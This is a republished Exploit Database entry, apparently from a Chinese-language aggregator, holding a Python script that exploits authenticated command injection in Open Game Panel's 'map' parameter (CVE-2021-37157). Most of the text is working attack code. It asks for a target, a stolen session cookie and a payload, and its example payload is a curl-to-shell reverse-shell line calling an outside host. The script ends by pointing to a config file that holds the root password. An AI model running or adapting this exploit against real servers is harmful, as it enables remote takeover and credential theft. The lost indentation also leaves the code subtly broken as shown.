Open Game Panel – Remote Code Execution (RCE) (Authenticated)

• Exploit Database
• 23 阅读

• 作者： prey
  日期： 2021-10-04
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/50373/

• # Exploit Title: Open Game Panel - Remote Code Execution (RCE) (Authenticated)
  # Google Dork: intext:"Open Game Panel 2021"
  # Date: 08/14/2021
  # Exploit Author: prey
  # Vendor Homepage: https://www.opengamepanel.org/
  # Software Link: https://github.com/OpenGamePanel/OGP-Website
  # Version: before 14 Aug patch (https://github.com/OpenGamePanel/OGP-Website/pull/561/commits)
  # Tested on: CentOS Linux 5.4.102
  
  #Before the patch, it was possible to inject system commands on "map" parameter when launching a new counter-strike server just by putting the command=
   betwen ';', the user needs to be authenticated for this.
  
  
  import requests
  
  banner = """
  @
  @ @@&@@@@@/
  @@& #@@@@@& .=
  ,/%@#
  @ @@@@@@@@@@@@@((%@@@@*
  @ #@@@@@@@@@@@@@@@*%@,
  @ @@@@@@@@@@@@@@&@@@@
  @&@@@@@@@@@/ &@@@.
  @@@@@@@@@@(
  @@@@@@@@@@@@@@&*
  @ &@@@@@@@@@@@@@@@@%
  @,&@@@@@@@@@@@@@
  @%@@@@@@@.
  @.%@@@@@@@@% @@@@@@
  @@@@@@# .&@@@@#
  @(@@@@@@@@@@@. .@@@& @@%
  @ .@@@@@, #@@@@@*#@@@ @@@@@
  @ @@@& &@@@.@@@
  @,@@@ @@@@@@
  @ @@@%@@@,
  @&@@@@@,
  @@@@
  @@@@
  
   *@@@@@# @@*@@%@@@@@@@@@@@/@@@ @@@ ,@@@ ,@(.@=
  %
   *@/@@ .@/ @(@@@@@@( @@ ,@(@@@* @#@@ @@(@ ,@(.@=
  %
   *@@@@@@@@ @ &&.@(@@ @.@@ @@@@ @@.@(@ @@(@. @@,@(.@=
  %
   *@/%@(@@@@ @@ *@@@@@@@ @@. @@@@@@@@, ,@(.@=
  %
   *@/ @@*@@@ @@%@@@@@@@*@@ @@ &@@@ ,@@@@@ .@=
  @@@@
  
  ##You can get mod_id and home_id on your game panel URL when you are logged
  
  """
  print(banner)
  
  target = input("Target url:(eg: https://panel.example.org)\n")
  opengamepanel_web = input("opengamepanel_web Cookie: (eg: kulonmu5ldu71nmggv2p571nu1)\n")
  mod_id = input("Mod_id value: (eg: 2437)\n")
  home_id = input("Home_id value: (eg: 3737)\n")
  server_ip_port = input("Server IP:port: (eg: 192.168.69.69:42069)\n")
  command = input("Payload: (eg: curl https://reverse-shell.sh/1.1.1.1:1337|sh)\n")
  
  url = target + "/home.php?m=gamemanager&p=game_monitor"
  cookies = {"opengamepanel_web": opengamepanel_web}
  headers = {"Content-Type": "application/x-www-form-urlencoded"}
  data = {"mod_id": mod_id, "home_id": home_id, "ip_port": server_ip_port, "map": ";" + command + ";", "start_server": "whatever"}
  try:
  requests.post(url, headers=headers, cookies=cookies, data=data)
  except:
  print("Something went wrong, check your inputs or try manually exploiting the map parameter")
  print("Finished. you can now literally read the file $HOME/OGP/Cfg/Config.pm for the root password yaay! (CVE-2021-37157)")